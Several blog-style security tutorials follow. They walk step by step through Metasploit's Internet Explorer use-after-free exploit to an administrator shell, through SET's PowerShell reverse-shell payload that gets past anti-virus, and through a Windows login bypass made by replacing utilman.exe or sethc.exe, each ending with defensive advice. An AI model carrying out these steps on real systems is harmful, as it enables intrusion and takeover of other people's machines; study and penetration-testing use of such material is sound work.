Latest Internet Explorer Zero-Day Exploit Walkthrough using Metasploit

IE Zero Day 2

The end of the year saw several zero day exploits being released. One for RealPlayer version 15 and under, one for Nvidia Video Cards, and what we will focus on today, a remote exploit for Internet Explorer Version 6-8. The Internet Explorer Zero-Day exploit that was publicly acknowledged on December 29th, affects Windows XP SP3, Vista, Windows 7 and Server 2003 and 2008. Systems running IE 9 and 10 are not affected.

The exploit code has been publicly released and has already been added to Metasploit. We will demonstrate the exploit using Backtrack 5r3 and a Windows XP sp3 system.

So let’s get started.

  • Boot up your Backtrack 5 system and run the msfupdate command to make sure you get the latest exploits.

(Had a heck of a time with running the updates lately. Most recently it seemed to hang on updating an outlook.rb file. I got by it earlier by deleting the file and re-running the update. But for this example we won’t be needing it, so you can just hit (p) for postpone if it hangs on updating it.)

  • Next start the msfconsole.
  • Now you can search for the internet explorer exploit by typing “search internet explorer” or by just typing it in as below.

At the msf> prompt type:

  • use exploit/windows/browser/ie_cbutton_uaf

Then type “show options” to see what options can be set:

IE Zero Day 2

Okay, we will need to set the SRVHOST option to point to our Backtrack system. And we can change the URIPATH to something else other than random if we want. But first, let’s set the target as it defaults to Windows 7, and our target in this example is a Windows XP system:

IE Zero Day 1

Next, set the IP address of your Backtrack system:

  • set SRVHOST 192.168.0.120

And finally run the exploit:

  • exploit

IE Zero Day 4-1

Okay, at this point Metasploit starts up the Apache web server,creates the exploit and creates a random page to host it on. Now all we need is to surf to the URL given to us by Backtrack 5 using Internet Explorer on the Windows XP system:

IE Zero Day 3

That is it!

As soon as the user surfs to our Backtrack page, the exploit is run and a remote session is created:

IE Zero Day 4-2

(Note: There were no real warnings or alerts on the Windows XP side. It just seemed that the webpage didn’t do anything.)

We can type “sessions -l” to list all the remote shell sessions that Backtrack has created.

IE Zero Day 5

As you can see our Windows XP session is listed. Now if we simply connect to the session interactively (sessions -i 1), and run “getuid” we see that we have an administrator level shell:

IE Zero Day 6

And simply running “shell” drops us into the full remote shell:

IE Zero Day 7

So how do we stop this attack? If you are running older versions of Internet Explorer, UPDATE NOW! This attack does not work against the latest version of IE. Microsoft was supposed to release a patch for older IE versions today, to stop this attack, but they didn’t do it.

And with the fix really being to simply upgrade to the newest version, they probably won’t any time soon.

The fix is also the same with the RealPlayer and Nvidia Zero-days that I mentioned earlier. Simply download the latest updates of the software to protect against the exploits.

Advertisements

Social Engineering Toolkit: Bypassing Anti-Virus using Powershell

Just when it looked like Anti-Virus was getting the upper hand against the Social Engineering Toolkit…

At the Security Bsides conference in Cleveland, David Kennedy the author of SET, showed off some of the program’s new features. One is a very interesting way to get a remote shell by completely bypass Anti-Virus using a Windows Powershell attack. Let’s take a quick look at how this works.

  • Fire up SET and pick option number “1” Social Engineering Attacks
  • Select option “10” Powershell attack vector:

  • Next choose number 1, “Powershell Alphanumeric Shellcode Injector“:

Okay, now just enter the IP address of the Backtrack system and what port you want to use for the windows machine to connect in on. Usually the default, 443 is good enough. SET will now create the exploit code for 32 and 64 bit Windows:

Now that it is done, it gives you the option to start a listener. This sets up SET to receive incoming connections from Windows systems. For those familiar with Metasploit, this just starts the standard multi-handler for a reverse shell. Enter “yes” and pick if you want a 32 or 64 bit listener.

SET starts up Metasploit, runs the payload handler  and waits for an incoming connection:

All we need to do now is retrieve the Powershell code that SET created. The code is saved in SET’s Report/ Powershell directory

When you navigate to the directory, you will see both the 32 and 64 bit versions of the Powershell code. If a Windows system runs this code, a remote session will open up to the Backtrack machine. For this example, I will just copy the code:

and Paste it into a Windows 7 command prompt

Once you hit enter, a full remote shell session is created to the Backtrack SET machine:

Game over. The Windows 7 system in this instance was fully updated and had one of the best anti-virus/ internet security programs available. The AV didn’t see a thing.

Powershell is available on almost every Windows box nowadays, making this a very powerful attack. This is an amazing tool for pentesters, but as usual there are those who will try to use it for evil purposes.

Most likely, you would need to be tricked into running this for the attack to be successful. So as always, be very careful opening files and links from e-mails and social media messages. Run an internet browser script blocking program like “NoScript” to prevent code from automatically running from visited websites.

Also be very wary of shortened links, especially used on Twitter. Recently I saw a shortened link on Twitter that when unshrunk was a four line command to a malware server.

How to Log into Windows without the Password

I covered this topic last year (Windows Backdoor: System Level Access via Hot Keys) but just ran into this again recently. How do you gain access to a Windows system that you have legitimately lost the password to?

Well, there seems to be a couple utilities out there that claim to allow you to do this. We tried a Linux Live-CD based, one that was supposed to allow you to change any Windows password. But it didn’t work.

I even tried Kon-Boot, both the CD based and USB flash drive variety. Kon-boot sounds very cool, and comes highly recommended. You boot Kon-Boot first, then after it is booted, it loads your OS. Then you can put in any password, or hit enter and it bypasses the login and allows you into the users account. It is supposed to work on Windows and Linux systems. But unfortunately it also did not work on my systems.

What to do? Well, I figured I would give my article from last year a shot to see if it still worked. (Okay, just a quick disclaimer. Do not do this on a system that you do not own, or have permission to modify. And messing with system files could leave your system in an unstable state, if you chose to continue, you do so at your own risk.)

So I booted into Ubuntu, went to the Windows System 32 directory, renamed utilman.exe to utilman.old, copied cmd.com to utilman.exe and rebooted.  At the Windows log in prompt I hit the “Windows”+”U” key and open pops a system level command prompt. From here you can type any windows command, add users, etc.

The funny part is you can type “explorer.exe”, hit enter and a you get a System level desktop. From here you can open Internet Explorer, and surf the web. And while you are doing all this, the Windows login screen dutifully stays in the background  protecting(?) your system.

I found the Utilman modification solution on Microsoft’s Technet site, but it is not the only one that works. A comment on last year’s post pointed me to another trick on Adam’s Technical Journal.  Modifying the “Sethc.exe” command in the same way also allows you to bypass the Windows login screen. The “sethc” file is for the Windows Sticky Keys function. Under normal operation, if you hit the Shift key something like 5 times in a row, the sticky key dialog box will pop up.

Doing so when the sethc file has been replaced with a copy of command.com, opens up a system command prompt at the login screen, just like the utilman modification above.

This process still works on a fully patched and updated Windows 7 system. When I checked it last year, it also worked on all of Windows server products. Windows protects these system files from being modified when Windows is booted, but booting in Linux to alter them just takes a couple minutes at most.

These techniques can be a life saver if you have lost the password to an important system, but it also goes to show that strong physical security is also needed when securing your systems.

Windows 7 Networks Vulnerable to RA DoS Attack

This has to be seen to be believed. In this video, Sam Bowne, of the City College San Fransisco, shows how rogue IPv6 Router Advertisements can crash all Windows IPv6 enabled systems on your network.

Sam (and others) notified Microsoft of the problem, only to be told that it was a known issue and Microsoft has no plans on patching it! It can be found on the DHS US-CERT Vulnerability Database as CVE-2010-4669.

Sam has an excellent Executive Summary on his site explaining the problem, and several remedies including:

  • Disable IPv6. This is drastic, and will break services you may want, such as HomeGroups and DirectAccess. But it will protect you.
  • Turn off Router Discovery — this is a simple solution, requiring only one command, but it will prevent you from using Stateless Autoconfiguration. It’s probably appropriate for servers, but not as good for client machines.
  • Use a firewall to block rogue Router Advertisements, while still allowing them from your authorized gateway. This is the most precise solution, but it is easily defeated.
  • Get a switch with RA Guard — details here: http://goo.gl/PlVlt

Check out Sam’s site for more information.